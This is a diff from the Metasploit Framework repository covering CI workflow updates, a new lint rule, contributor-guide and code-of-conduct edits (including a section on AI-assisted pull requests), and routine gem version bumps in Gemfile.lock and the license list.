Merge pull request #20800 from adfoster-r7/add-autocheck-vulnerability-logic

Add autocheck report_vuln logic
automatic module_metadata_base.json update
2025-12-22 15:58:18 -05:00 · 2025-12-22 20:06:27 +00:00 · 2025-12-22 14:56:48 -05:00 · 2025-12-22 14:27:09 -05:00 · 2025-12-22 13:09:32 +00:00 · 2025-12-19 23:51:36 +00:00
1346 changed files with 44006 additions and 10558 deletions
@@ -38,7 +38,7 @@ jobs:
      fail-fast: true
      matrix:
        ruby:
-          - '3.0'
+          - '3.3'

    name: Ruby ${{ matrix.ruby }}
    steps:
@@ -44,6 +44,7 @@ on:
      - 'Gemfile.lock'
      - 'data/templates/**'
      - 'modules/payloads/**'
+      - 'lib/msf/base/sessions/**'
      - 'lib/msf/core/payload/**'
      - 'lib/msf/core/**'
      - 'test/modules/**'
@@ -31,7 +31,7 @@ jobs:
          - ubuntu-latest
          - windows-2022
          - windows-2025
-          - macos-13
+          - macos-15-intel

    env:
      RAILS_ENV: test
@@ -67,7 +67,7 @@ jobs:
      fail-fast: false
      matrix:
        os:
-          - macos-13
+          - macos-15-intel
          - windows-2022
          - ubuntu-latest
        ruby:
@@ -92,7 +92,7 @@ jobs:
          # - { meterpreter: { name: windows_meterpreter }, ruby: '3.4', os: windows-2025 }

          # Mettle
-          - { meterpreter: { name: mettle }, os: macos-13 }
+          - { meterpreter: { name: mettle }, os: macos-15-intel }
          - { meterpreter: { name: mettle }, os: ubuntu-latest }

    runs-on: ${{ matrix.os }}
@@ -269,12 +269,26 @@ jobs:
        working-directory: metasploit-payloads

      - name: Build Windows payloads via Visual Studio 2022 Build (Windows)
-        shell: cmd
+        shell: pwsh
        if: ${{ matrix.meterpreter.name == 'windows_meterpreter' && matrix.os == 'windows-2022' && inputs.build_metasploit_payloads }}
        run: |
-          cd c/meterpreter
-          git submodule init && git submodule update
-          make.bat
+          Set-Location "C:\Program Files (x86)\Microsoft Visual Studio\Installer\"
+          dir
+          $InstallPath = "C:\Program Files\Microsoft Visual Studio\2022\Enterprise"
+          $WorkLoads = '--config "D:\a\metasploit-payloads\metasploit-payloads\metasploit-payloads\c\meterpreter\vs-configs\vs2022.vsconfig"'
+          $Arguments = ('/c', "vs_installer.exe", 'modify', '--installPath', "`"$InstallPath`"", $WorkLoads, '--quiet', '--norestart', '--nocache')
+          $process = Start-Process -FilePath cmd.exe -ArgumentList $Arguments -Wait -PassThru -WindowStyle Hidden
+          if ($process.ExitCode -eq 0) {
+            Write-Host "components have been successfully added"
+          } else {
+            Write-Host "components were not installed"
+            exit 1
+          }
+          Set-Location "D:\a\metasploit-payloads\metasploit-payloads\metasploit-payloads\c\meterpreter"
+          $r = Invoke-Command -ScriptBlock { cmd.exe /c 'git submodule init && git submodule update' }
+          Write-Host $r
+          $r = Invoke-Command -ScriptBlock { cmd.exe /c '"C:\Program Files\Microsoft Visual Studio\2022\Enterprise\Common7\Tools\VsDevCmd.bat" && make.bat' }
+          Write-Host $r
        working-directory: metasploit-payloads

      - name: Build Windows payloads via Visual Studio 2025 Build (Windows)
@@ -24,6 +24,7 @@ require:
  - ./lib/rubocop/cop/lint/module_enforce_notes.rb
  - ./lib/rubocop/cop/lint/detect_invalid_pack_directives.rb
  - ./lib/rubocop/cop/lint/detect_metadata_trailing_leading_whitespace.rb
+  - ./lib/rubocop/cop/lint/detect_outdated_cmd_exec_api.rb

 Layout/SpaceBeforeBrackets:
  Enabled: true
@@ -676,3 +677,9 @@ Style/UnpackFirst:

 Lint/DetectMetadataTrailingLeadingWhitespace:
  Enabled: true
+
+Lint/DetectOutdatedCmdExecApi:
+  Description: >-
+    Detects outdated usage of cmd_exec with separate arguments.
+    Use `create_process(executable, args: [], time_out: 15, opts: {})` API with an args array instead.
+  Enabled: true
@@ -37,7 +37,7 @@ when an individual is representing the project or its community.
 Instances of abusive, harassing, or otherwise unacceptable behavior may be
 reported by contacting the project maintainers at msfdev@metasploit.com. If
 the incident involves a committer, you may report it directly to
-caitlin_condon@rapid7.com or todb@metasploit.com.
+smcintyre@metasploit.com or jacquelyn_harris@rapid7.com.

 All complaints will be reviewed and investigated and will result in a
 response that is deemed necessary and appropriate to the circumstances.
@@ -11,7 +11,7 @@ Before we get into the details of contributing code, you should know there are m
 - [Help fellow users with open issues]. This can require technical knowledge, but you can also get involved in conversations about bug reports and feature requests. This is a great way to get involved without getting too overwhelmed!
 - [Help fellow committers test recently submitted pull requests](https://github.com/rapid7/metasploit-framework/pulls). Again this can require some technical skill, but by pulling down a pull request and testing it, you can help ensure our new code contributions for stability and quality.
 - [Report a security vulnerability in Metasploit itself] to Rapid7. If you see something you think makes Metasploit vulnerable to an attack, let us know!
- - Add [module documentation]. New documentation is always needed and cleaning up existing documents is just as important! If you're a non-native english speaker, you can help by replacing any ambiguous idioms, metaphors, or unclear language that might make our documentation hard to understand.
+ - Add [module documentation]. New documentation is always needed and cleaning up existing documents is just as important! If you're a non-native English speaker, you can help by replacing any ambiguous idioms, metaphors, or unclear language that might make our documentation hard to understand.


 ## Code Contributions
@@ -25,8 +25,10 @@ will be closed. We need to ensure the code we're adding to master is written to
 ## Expedited Module Creation Process
 We strive to respect the community that has given us so much, so in the odd situation where we get multiple submissions for the same vulnerability, generally we will work with the first person who assigns themselves to the issue or the first person that submits a good-faith PR.  A good-faith PR might not even work, but it will show that the author is working their way toward a solution.  Despite this general rule, there are rare circumstances where we may ask a contributor to step aside or allow a committer to take the lead on the creation of a new module if a complete and working module with documents has not already been submitted.  This kind of expedited module creation process comes up infrequently, and usually it involves high-profile or high priority modules that we have marked internally as time-critical: think KEV list, active exploitation campaigns, CISA announcements, etc.  In those cases, we may ask a contributor that is assigned to the issue or who has submitted an incomplete module to allow a committer to take over an issue or a module PR in the interest of getting a module out quickly.  If a contributor has submitted an incomplete module, they will remain as a co-author of the module and we may build directly onto the PR they submitted, leaving the original commits in the tree.  We sincerely hope that the original author will remain involved in this expedited module creation process.  We would appreciate testing, critiquing, and any assistance that can be offered.  If the module is complete but requires minor changes, we may ask the contributor to allow us to take over testing/verification and make these minor changes without asking so we can land the module as quickly as possible.  In these cases of minor code changes, the authorship of the module will remain unchanged.  We hope everyone involved in this expedited module creation process continues to feel valued and appreciated.

-### Code Contribution Do's & Don'ts:
+## Vibecoding, AI, and LLM
+My first job had a token ring LAN and I still own a Win98SE CD, so I'm not entirely sure what _vibecoding_ is, but we're cool with any coding technique you use to create a PR as long as it is tested, documented, and does what it says it does.  Untested code is incomplete code, and incomplete code should be marked as a draft PR or WIP (Work in Progress) until it is complete, tested, and ready for a committer to review.  We have had several submissions clearly from AI that were well-formatted, looked really neat, and did nothing it said it did.  While we have no problem with AI-assisted coding, please do not assume that the code generated by an AI or LLM is logically or even syntactically correct.

+### Code Contribution Do's & Don'ts:
 Keeping the following in mind gives your contribution the best chance of landing!

 #### <u>Pull Requests</u>
@@ -42,7 +44,7 @@ Keeping the following in mind gives your contribution the best chance of landing
 * **Do** target your pull request to the **master branch**.
 * **Do** specify a descriptive title to make searching for your pull request easier.
 * **Do** include [console output], especially for effects that can be witnessed in the  `msfconsole`.
-* **Do** test your code.
+* **Do** test your code and submit the test output in your PR with any sensitive information removed.
 * **Do** list [verification steps] so committers can test your code.
 * **Do** [reference associated issues] in your pull request description.
 * **Don't** leave your pull request description blank.
@@ -85,7 +87,7 @@ When reporting Metasploit issues:
 * **Don't** attempt to report issues on a closed PR.

 If you need some more guidance, talk to the main body of open source contributors over on our
-[Metasploit Slack] or [#metasploit on Freenode IRC].
+[GitHub Discussions](https://github.com/rapid7/metasploit-framework/discussions) or [Metasploit Slack]

 Finally, **thank you** for taking the few moments to read this far! You're already way ahead of the
 curve, so keep it up!
@@ -1,12 +1,12 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (6.4.76)
+    metasploit-framework (6.4.104)
      aarch64
      abbrev
-      actionpack (~> 7.1.0)
-      activerecord (~> 7.1.0)
-      activesupport (~> 7.1.0)
+      actionpack (~> 7.2.0)
+      activerecord (~> 7.2.0)
+      activesupport (~> 7.2.0)
      aws-sdk-ec2
      aws-sdk-ec2instanceconnect
      aws-sdk-iam
@@ -20,8 +20,8 @@ PATH
      bootsnap
      bson
      chunky_png
-      concurrent-ruby (= 1.3.4)
      csv
+      date (= 3.4.1)
      dnsruby
      drb
      ed25519
@@ -29,7 +29,7 @@ PATH
      em-http-request
      eventmachine
      faker
-      faraday (= 2.7.11)
+      faraday
      faraday-retry
      faye-websocket
      ffi (< 1.17.0)
@@ -46,9 +46,9 @@ PATH
      metasploit-concern
      metasploit-credential
      metasploit-model
-      metasploit-payloads (= 2.0.221)
+      metasploit-payloads (= 2.0.237)
      metasploit_data_models (>= 6.0.7)
-      metasploit_payloads-mettle (= 1.0.42)
+      metasploit_payloads-mettle (= 1.0.45)
      mqtt
      msgpack (~> 1.6.0)
      mutex_m
@@ -61,11 +61,12 @@ PATH
      network_interface
      nexpose
      nokogiri
-      octokit (~> 4.0)
+      octokit
      openssl-ccm
      openvas-omp
      ostruct
      packetfu
+      parallel
      patch_finder
      pcaprub
      pdf-reader
@@ -78,6 +79,7 @@ PATH
      recog
      redcarpet
      reline
+      rest-client
      rex-arch
      rex-bin_tools
      rex-core
@@ -96,6 +98,7 @@ PATH
      rex-struct2
      rex-text
      rex-zip
+      rexml (= 3.4.1)
      rinda
      ruby-macho
      ruby-mysql
@@ -108,7 +111,7 @@ PATH
      stringio (= 3.1.1)
      swagger-blocks
      syslog
-      thin (~> 1.8)
+      thin (~> 1.x)
      tzinfo
      tzinfo-data
      unix-crypt
@@ -127,41 +130,41 @@ GEM
    aarch64 (2.1.0)
      racc (~> 1.6)
    abbrev (0.1.2)
-    actionpack (7.1.5.1)
-      actionview (= 7.1.5.1)
-      activesupport (= 7.1.5.1)
+    actionpack (7.2.2.2)
+      actionview (= 7.2.2.2)
+      activesupport (= 7.2.2.2)
      nokogiri (>= 1.8.5)
      racc
-      rack (>= 2.2.4)
+      rack (>= 2.2.4, < 3.2)
      rack-session (>= 1.0.1)
      rack-test (>= 0.6.3)
      rails-dom-testing (~> 2.2)
      rails-html-sanitizer (~> 1.6)
-    actionview (7.1.5.1)
-      activesupport (= 7.1.5.1)
+      useragent (~> 0.16)
+    actionview (7.2.2.2)
+      activesupport (= 7.2.2.2)
      builder (~> 3.1)
      erubi (~> 1.11)
      rails-dom-testing (~> 2.2)
      rails-html-sanitizer (~> 1.6)
-    activemodel (7.1.5.1)
-      activesupport (= 7.1.5.1)
-    activerecord (7.1.5.1)
-      activemodel (= 7.1.5.1)
-      activesupport (= 7.1.5.1)
+    activemodel (7.2.2.2)
+      activesupport (= 7.2.2.2)
+    activerecord (7.2.2.2)
+      activemodel (= 7.2.2.2)
+      activesupport (= 7.2.2.2)
      timeout (>= 0.4.0)
-    activesupport (7.1.5.1)
+    activesupport (7.2.2.2)
      base64
      benchmark (>= 0.3)
      bigdecimal
-      concurrent-ruby (~> 1.0, >= 1.0.2)
+      concurrent-ruby (~> 1.0, >= 1.3.1)
      connection_pool (>= 2.2.5)
      drb
      i18n (>= 1.6, < 2)
      logger (>= 1.4.2)
      minitest (>= 5.1)
-      mutex_m
      securerandom (>= 0.3)
-      tzinfo (~> 2.0)
+      tzinfo (~> 2.0, >= 2.0.5)
    addressable (2.8.7)
      public_suffix (>= 2.0.2, < 7.0)
    afm (0.2.2)
@@ -175,61 +178,62 @@ GEM
    arel-helpers (2.16.0)
      activerecord (>= 3.1.0, < 8.1)
    ast (2.4.3)
-    aws-eventstream (1.4.0)
-    aws-partitions (1.1134.0)
-    aws-sdk-core (3.227.0)
+    aws-eventstream (1.3.2)
+    aws-partitions (1.1065.0)
+    aws-sdk-core (3.220.1)
      aws-eventstream (~> 1, >= 1.3.0)
      aws-partitions (~> 1, >= 1.992.0)
      aws-sigv4 (~> 1.9)
      base64
      jmespath (~> 1, >= 1.6.1)
-      logger
-    aws-sdk-ec2 (1.541.0)
-      aws-sdk-core (~> 3, >= 3.227.0)
+    aws-sdk-ec2 (1.511.0)
+      aws-sdk-core (~> 3, >= 3.216.0)
      aws-sigv4 (~> 1.5)
-    aws-sdk-ec2instanceconnect (1.59.0)
-      aws-sdk-core (~> 3, >= 3.227.0)
+    aws-sdk-ec2instanceconnect (1.55.0)
+      aws-sdk-core (~> 3, >= 3.216.0)
      aws-sigv4 (~> 1.5)
-    aws-sdk-iam (1.125.0)
-      aws-sdk-core (~> 3, >= 3.227.0)
+    aws-sdk-iam (1.119.0)
+      aws-sdk-core (~> 3, >= 3.216.0)
      aws-sigv4 (~> 1.5)
-    aws-sdk-kms (1.107.0)
-      aws-sdk-core (~> 3, >= 3.227.0)
+    aws-sdk-kms (1.99.0)
+      aws-sdk-core (~> 3, >= 3.216.0)
      aws-sigv4 (~> 1.5)
-    aws-sdk-s3 (1.194.0)
-      aws-sdk-core (~> 3, >= 3.227.0)
+    aws-sdk-s3 (1.182.0)
+      aws-sdk-core (~> 3, >= 3.216.0)
      aws-sdk-kms (~> 1)
      aws-sigv4 (~> 1.5)
-    aws-sdk-ssm (1.199.0)
-      aws-sdk-core (~> 3, >= 3.227.0)
+    aws-sdk-ssm (1.191.0)
+      aws-sdk-core (~> 3, >= 3.216.0)
      aws-sigv4 (~> 1.5)
-    aws-sigv4 (1.12.1)
+    aws-sigv4 (1.11.0)
      aws-eventstream (~> 1, >= 1.0.2)
-    base64 (0.2.0)
+    base64 (0.3.0)
    bcrypt (3.1.20)
    bcrypt_pbkdf (1.1.1)
    benchmark (0.4.1)
-    bigdecimal (3.2.2)
+    bigdecimal (3.2.3)
    bindata (2.4.15)
-    bootsnap (1.18.6)
+    bootsnap (1.18.4)
      msgpack (~> 1.2)
    bson (5.1.1)
    builder (3.3.0)
    byebug (12.0.0)
    chunky_png (1.4.0)
    coderay (1.1.3)
-    concurrent-ruby (1.3.4)
-    connection_pool (2.5.3)
+    concurrent-ruby (1.3.5)
+    connection_pool (2.5.4)
    cookiejar (0.3.4)
    crass (1.0.6)
-    csv (3.3.5)
+    csv (3.3.2)
    daemons (1.4.1)
    date (3.4.1)
    debug (1.11.0)
      irb (~> 1.10)
      reline (>= 0.3.8)
    diff-lcs (1.6.2)
-    dnsruby (1.72.2)
+    dnsruby (1.73.1)
+      base64 (>= 0.2)
+      logger (~> 1.6)
      simpleidn (~> 0.2.1)
    docile (1.4.1)
    domain_name (0.6.20240107)
@@ -246,28 +250,28 @@ GEM
    em-socksify (0.3.3)
      base64
      eventmachine (>= 1.0.0.beta.4)
-    erb (5.0.2)
+    erb (5.0.3)
    erubi (1.13.1)
    eventmachine (1.2.7)
-    factory_bot (6.5.4)
+    factory_bot (6.5.5)
      activesupport (>= 6.1.0)
-    factory_bot_rails (6.5.0)
+    factory_bot_rails (6.5.1)
      factory_bot (~> 6.5)
      railties (>= 6.1.0)
-    faker (3.5.2)
+    faker (3.5.1)
      i18n (>= 1.8.11, < 2)
    faraday (2.7.11)
      base64
      faraday-net_http (>= 2.0, < 3.1)
      ruby2_keywords (>= 0.0.4)
    faraday-net_http (3.0.2)
-    faraday-retry (2.3.2)
+    faraday-retry (2.2.1)
      faraday (~> 2.0)
-    faye-websocket (0.12.0)
+    faye-websocket (0.11.3)
      eventmachine (>= 0.12.0)
-      websocket-driver (>= 0.8.0)
+      websocket-driver (>= 0.5.1)
    ffi (1.16.3)
-    fiddle (1.1.8)
+    fiddle (1.1.6)
    filesize (0.2.0)
    fivemat (1.3.7)
    forwardable (1.3.3)
@@ -282,6 +286,7 @@ GEM
    hrr_rb_ssh-ed25519 (0.4.2)
      ed25519 (~> 1.2)
      hrr_rb_ssh (>= 0.4)
+    http-accept (1.7.0)
    http-cookie (1.0.8)
      domain_name (~> 0.5)
    http_parser.rb (0.8.0)
@@ -298,7 +303,7 @@ GEM
    jmespath (1.6.2)
    jsobfu (0.4.2)
      rkelly-remix
-    json (2.13.1)
+    json (2.15.1)
    language_server-protocol (3.17.0.5)
    license_finder (5.11.1)
      bundler
@@ -326,7 +331,7 @@ GEM
      mutex_m
      railties (~> 7.0)
      zeitwerk
-    metasploit-credential (6.0.16)
+    metasploit-credential (6.0.19)
      bigdecimal
      csv
      drb
@@ -339,7 +344,7 @@ GEM
      railties
      rex-socket
      rubyntlm
-      rubyzip
+      rubyzip (< 3.0.0)
    metasploit-model (5.0.4)
      activemodel (~> 7.0)
      activesupport (~> 7.0)
@@ -347,36 +352,34 @@ GEM
      drb
      mutex_m
      railties (~> 7.0)
-    metasploit-payloads (2.0.221)
-    metasploit_data_models (6.0.10)
+    metasploit-payloads (2.0.237)
+    metasploit_data_models (6.0.9)
      activerecord (~> 7.0)
      activesupport (~> 7.0)
      arel-helpers
-      bigdecimal
-      drb
      metasploit-concern
      metasploit-model (>= 3.1)
-      mutex_m
      pg
      railties (~> 7.0)
      recog
      webrick
-    metasploit_payloads-mettle (1.0.42)
+    metasploit_payloads-mettle (1.0.45)
    method_source (1.1.0)
    mime-types (3.7.0)
      logger
      mime-types-data (~> 3.2025, >= 3.2025.0507)
-    mime-types-data (3.2025.0722)
+    mime-types-data (3.2025.0924)
    mini_portile2 (2.8.9)
    minitest (5.25.5)
-    mqtt (0.6.0)
+    mqtt (0.7.0)
+      logger
    msgpack (1.6.1)
-    multi_json (1.17.0)
+    multi_json (1.15.0)
    mustermann (3.0.3)
      ruby2_keywords (~> 0.0.1)
    mutex_m (0.3.0)
    nessus_rest (0.1.6)
-    net-imap (0.5.9)
+    net-imap (0.5.6)
      date
      net-protocol
    net-ldap (0.19.0)
@@ -387,25 +390,26 @@ GEM
    net-smtp (0.5.1)
      net-protocol
    net-ssh (7.3.0)
+    netrc (0.11.0)
    network_interface (0.0.4)
    nexpose (7.3.0)
    nio4r (2.7.4)
-    nokogiri (1.18.9)
+    nokogiri (1.18.10)
      mini_portile2 (~> 2.8.2)
      racc (~> 1.4)
    nori (2.7.1)
      bigdecimal
-    octokit (4.25.1)
+    octokit (10.0.0)
      faraday (>= 1, < 3)
      sawyer (~> 0.9)
    openssl-ccm (1.2.3)
    openssl-cmac (2.0.2)
    openvas-omp (0.0.4)
-    ostruct (0.6.3)
+    ostruct (0.6.1)
    packetfu (2.0.0)
      pcaprub (~> 0.13.1)
    parallel (1.27.0)
-    parser (3.3.8.0)
+    parser (3.3.9.0)
      ast (~> 2.4.1)
      racc
    parslet (1.8.2)
@@ -418,10 +422,10 @@ GEM
      ruby-rc4
      ttfunk
    pg (1.5.9)
-    pp (0.6.2)
+    pp (0.6.3)
      prettyprint
    prettyprint (0.2.0)
-    prism (1.4.0)
+    prism (1.5.1)
    pry (0.15.2)
      coderay (~> 1.1)
      method_source (~> 1.0)
@@ -435,7 +439,7 @@ GEM
    puma (6.6.0)
      nio4r (~> 2.0)
    racc (1.8.1)
-    rack (2.2.17)
+    rack (2.2.19)
    rack-protection (3.2.0)
      base64 (>= 0.1.0)
      rack (~> 2.2, >= 2.2.4)
@@ -453,10 +457,10 @@ GEM
    rails-html-sanitizer (1.6.2)
      loofah (~> 2.21)
      nokogiri (>= 1.15.7, != 1.16.7, != 1.16.6, != 1.16.5, != 1.16.4, != 1.16.3, != 1.16.2, != 1.16.1, != 1.16.0.rc1, != 1.16.0)
-    railties (7.1.5.1)
-      actionpack (= 7.1.5.1)
-      activesupport (= 7.1.5.1)
-      irb
+    railties (7.2.2.2)
+      actionpack (= 7.2.2.2)
+      activesupport (= 7.2.2.2)
+      irb (~> 1.13)
      rackup (>= 1.0.0)
      rake (>= 12.2)
      thor (~> 1.0, >= 1.2.2)
@@ -466,30 +470,36 @@ GEM
    rasn1 (0.14.0)
      strptime (~> 0.2.5)
    rb-readline (0.5.5)
-    rdoc (6.14.2)
+    rdoc (6.15.0)
      erb
      psych (>= 4.0.0)
-    recog (3.1.18)
+      tsort
+    recog (3.1.14)
      nokogiri
    redcarpet (3.6.1)
-    regexp_parser (2.10.0)
+    regexp_parser (2.11.3)
    reline (0.6.2)
      io-console (~> 0.5)
    require_all (3.0.0)
+    rest-client (2.1.0)
+      http-accept (>= 1.7.0, < 2.0)
+      http-cookie (>= 1.0.2, < 2.0)
+      mime-types (>= 1.16, < 4.0)
+      netrc (~> 0.8)
    rex-arch (0.1.18)
      rex-text
-    rex-bin_tools (0.1.12)
+    rex-bin_tools (0.1.10)
      metasm
      rex-arch
      rex-core
      rex-struct2
      rex-text
-    rex-core (0.1.34)
+    rex-core (0.1.35)
    rex-encoder (0.1.8)
      metasm
      rex-arch
      rex-text
-    rex-exploitation (0.1.42)
+    rex-exploitation (0.1.44)
      bigdecimal
      jsobfu
      metasm
@@ -499,19 +509,18 @@ GEM
      rex-text
      rexml
    rex-java (0.1.8)
-    rex-mime (0.1.12)
-      bigdecimal
+    rex-mime (0.1.11)
      rex-text
    rex-nop (0.1.4)
      rex-arch
    rex-ole (0.1.9)
      rex-text
-    rex-powershell (0.1.102)
+    rex-powershell (0.1.103)
      bigdecimal
      rex-random_identifier
      rex-text
      ruby-rc4
-    rex-random_identifier (0.1.16)
+    rex-random_identifier (0.1.21)
      bigdecimal
      rex-text
    rex-registry (0.1.6)
@@ -519,7 +528,7 @@ GEM
      metasm
      rex-core
      rex-text
-    rex-socket (0.1.63)
+    rex-socket (0.1.64)
      dnsruby
      rex-core
    rex-sslscan (0.1.13)
@@ -549,17 +558,17 @@ GEM
    rspec-mocks (3.13.5)
      diff-lcs (>= 1.2.0, < 2.0)
      rspec-support (~> 3.13.0)
-    rspec-rails (7.1.1)
-      actionpack (>= 7.0)
-      activesupport (>= 7.0)
-      railties (>= 7.0)
+    rspec-rails (8.0.2)
+      actionpack (>= 7.2)
+      activesupport (>= 7.2)
+      railties (>= 7.2)
      rspec-core (~> 3.13)
      rspec-expectations (~> 3.13)
      rspec-mocks (~> 3.13)
      rspec-support (~> 3.13)
    rspec-rerun (1.1.0)
      rspec (~> 3.0)
-    rspec-support (3.13.4)
+    rspec-support (3.13.6)
    rubocop (1.75.7)
      json (~> 2.3)
      language_server-protocol (~> 3.17.0.2)
@@ -571,7 +580,7 @@ GEM
      rubocop-ast (>= 1.44.0, < 2.0)
      ruby-progressbar (~> 1.7)
      unicode-display_width (>= 2.4.0, < 4.0)
-    rubocop-ast (1.46.0)
+    rubocop-ast (1.47.1)
      parser (>= 3.3.7.2)
      prism (~> 1.4)
    ruby-macho (4.1.0)
@@ -581,7 +590,7 @@ GEM
    ruby-progressbar (1.13.0)
    ruby-rc4 (0.1.5)
    ruby2_keywords (0.0.5)
-    ruby_smb (3.3.16)
+    ruby_smb (3.3.15)
      bindata (= 2.4.15)
      openssl-ccm
      openssl-cmac
@@ -597,7 +606,7 @@ GEM
    simplecov (0.18.2)
      docile (~> 1.1)
      simplecov-html (~> 0.11)
-    simplecov-html (0.13.2)
+    simplecov-html (0.13.1)
    simpleidn (0.2.3)
    sinatra (3.2.0)
      mustermann (~> 3.0)
@@ -618,25 +627,27 @@ GEM
      eventmachine (~> 1.0, >= 1.0.4)
      rack (>= 1, < 3)
    thor (1.4.0)
-    tilt (2.6.1)
+    tilt (2.6.0)
    timecop (0.9.10)
    timeout (0.4.3)
    toml (0.2.0)
      parslet (~> 1.8.0)
+    tsort (0.2.0)
    ttfunk (1.8.0)
      bigdecimal (~> 3.1)
    tzinfo (2.0.6)
      concurrent-ruby (~> 1.0)
-    tzinfo-data (1.2025.2)
+    tzinfo-data (1.2025.1)
      tzinfo (>= 1.0.0)
-    unicode-display_width (3.1.4)
-      unicode-emoji (~> 4.0, >= 4.0.4)
-    unicode-emoji (4.0.4)
+    unicode-display_width (3.2.0)
+      unicode-emoji (~> 4.1)
+    unicode-emoji (4.1.0)
    unix-crypt (1.3.1)
+    useragent (0.16.11)
    warden (1.2.9)
      rack (>= 2.0.9)
    webrick (1.9.1)
-    websocket-driver (0.8.0)
+    websocket-driver (0.7.7)
      base64
      websocket-extensions (>= 0.1.0)
    websocket-extensions (0.1.5)
@@ -2,15 +2,15 @@ This file is auto-generated by tools/dev/update_gem_licenses.sh
 Ascii85, 2.0.1, MIT
 aarch64, 2.1.0, "Apache 2.0"
 abbrev, 0.1.2, "ruby, Simplified BSD"
-actionpack, 7.1.5.1, MIT
-actionview, 7.1.5.1, MIT
-activemodel, 7.1.5.1, MIT
-activerecord, 7.1.5.1, MIT
-activesupport, 7.1.5.1, MIT
+actionpack, 7.2.2.2, MIT
+actionview, 7.2.2.2, MIT
+activemodel, 7.2.2.2, MIT
+activerecord, 7.2.2.2, MIT
+activesupport, 7.2.2.2, MIT
 addressable, 2.8.7, "Apache 2.0"
 afm, 0.2.2, MIT
-allure-rspec, 2.26.0, "Apache 2.0"
-allure-ruby-commons, 2.26.0, "Apache 2.0"
+allure-rspec, 2.27.0, "Apache 2.0"
+allure-ruby-commons, 2.27.0, "Apache 2.0"
 arel-helpers, 2.16.0, MIT
 ast, 2.4.3, MIT
 aws-eventstream, 1.3.2, "Apache 2.0"
@@ -23,41 +23,41 @@ aws-sdk-kms, 1.99.0, "Apache 2.0"
 aws-sdk-s3, 1.182.0, "Apache 2.0"
 aws-sdk-ssm, 1.191.0, "Apache 2.0"
 aws-sigv4, 1.11.0, "Apache 2.0"
-base64, 0.2.0, "ruby, Simplified BSD"
+base64, 0.3.0, "ruby, Simplified BSD"
 bcrypt, 3.1.20, MIT
 bcrypt_pbkdf, 1.1.1, MIT
 benchmark, 0.4.1, "ruby, Simplified BSD"
-bigdecimal, 3.2.2, "ruby, Simplified BSD"
+bigdecimal, 3.2.3, "ruby, Simplified BSD"
 bindata, 2.4.15, "Simplified BSD"
 bootsnap, 1.18.4, MIT
-bson, 5.0.2, "Apache 2.0"
+bson, 5.1.1, "Apache 2.0"
 builder, 3.3.0, MIT
 bundler, 2.5.22, MIT
-byebug, 11.1.3, "Simplified BSD"
+byebug, 12.0.0, "Simplified BSD"
 chunky_png, 1.4.0, MIT
 coderay, 1.1.3, MIT
-concurrent-ruby, 1.3.4, MIT
-connection_pool, 2.5.3, MIT
+concurrent-ruby, 1.3.5, MIT
+connection_pool, 2.5.4, MIT
 cookiejar, 0.3.4, "Simplified BSD"
 crass, 1.0.6, MIT
 csv, 3.3.2, "ruby, Simplified BSD"
 daemons, 1.4.1, MIT
 date, 3.4.1, "ruby, Simplified BSD"
-debug, 1.8.0, "ruby, Simplified BSD"
-diff-lcs, 1.6.0, "MIT, Artistic-1.0-Perl, GPL-2.0-or-later"
-dnsruby, 1.72.4, "Apache 2.0"
+debug, 1.11.0, "ruby, Simplified BSD"
+diff-lcs, 1.6.2, "MIT, Artistic-1.0-Perl, GPL-2.0-or-later"
+dnsruby, 1.73.1, "Apache 2.0"
 docile, 1.4.1, MIT
 domain_name, 0.6.20240107, "Simplified BSD, New BSD, Mozilla Public License 2.0"
 drb, 2.2.3, "ruby, Simplified BSD"
-ed25519, 1.3.0, MIT
+ed25519, 1.4.0, MIT
 elftools, 1.3.1, MIT
 em-http-request, 1.1.7, MIT
 em-socksify, 0.3.3, MIT
-erb, 5.0.2, "ruby, Simplified BSD"
+erb, 5.0.3, "ruby, Simplified BSD"
 erubi, 1.13.1, MIT
 eventmachine, 1.2.7, "ruby, GPL-2.0"
-factory_bot, 6.5.1, MIT
-factory_bot_rails, 6.4.4, MIT
+factory_bot, 6.5.5, MIT
+factory_bot_rails, 6.5.1, MIT
 faker, 3.5.1, MIT
 faraday, 2.7.11, MIT
 faraday-net_http, 3.0.2, MIT
@@ -74,6 +74,7 @@ gyoku, 1.4.0, MIT
 hashery, 2.1.2, "Simplified BSD"
 hrr_rb_ssh, 0.4.2, "Apache 2.0"
 hrr_rb_ssh-ed25519, 0.4.2, "Apache 2.0"
+http-accept, 1.7.0, MIT
 http-cookie, 1.0.8, MIT
 http_parser.rb, 0.8.0, MIT
 httpclient, 2.9.0, ruby
@@ -83,30 +84,30 @@ ipaddr, 1.2.7, "ruby, Simplified BSD"
 irb, 1.15.2, "ruby, Simplified BSD"
 jmespath, 1.6.2, "Apache 2.0"
 jsobfu, 0.4.2, "New BSD"
-json, 2.10.2, ruby
+json, 2.15.1, ruby
 language_server-protocol, 3.17.0.5, MIT
 license_finder, 5.11.1, MIT
 lint_roller, 1.1.0, MIT
 little-plugger, 1.1.4, MIT
-logger, 1.6.6, "ruby, Simplified BSD"
+logger, 1.7.0, "ruby, Simplified BSD"
 logging, 2.4.0, MIT
 loofah, 2.24.1, MIT
 lru_redux, 1.1.0, MIT
 memory_profiler, 1.1.0, MIT
 metasm, 1.0.5, LGPL-2.1
 metasploit-concern, 5.0.5, "New BSD"
-metasploit-credential, 6.0.16, "New BSD"
-metasploit-framework, 6.4.76, "New BSD"
+metasploit-credential, 6.0.19, "New BSD"
+metasploit-framework, 6.4.104, "New BSD"
 metasploit-model, 5.0.4, "New BSD"
-metasploit-payloads, 2.0.221, "3-clause (or ""modified"") BSD"
-metasploit_data_models, 6.0.10, "New BSD"
-metasploit_payloads-mettle, 1.0.42, "3-clause (or ""modified"") BSD"
+metasploit-payloads, 2.0.237, "3-clause (or ""modified"") BSD"
+metasploit_data_models, 6.0.9, "New BSD"
+metasploit_payloads-mettle, 1.0.45, "3-clause (or ""modified"") BSD"
 method_source, 1.1.0, MIT
-mime-types, 3.6.0, MIT
-mime-types-data, 3.2025.0304, MIT
+mime-types, 3.7.0, MIT
+mime-types-data, 3.2025.0924, MIT
 mini_portile2, 2.8.9, MIT
 minitest, 5.25.5, MIT
-mqtt, 0.6.0, MIT
+mqtt, 0.7.0, MIT
 msgpack, 1.6.1, "Apache 2.0"
 multi_json, 1.15.0, MIT
 mustermann, 3.0.3, MIT
@@ -118,65 +119,67 @@ net-protocol, 0.2.2, "ruby, Simplified BSD"
 net-sftp, 4.0.0, MIT
 net-smtp, 0.5.1, "ruby, Simplified BSD"
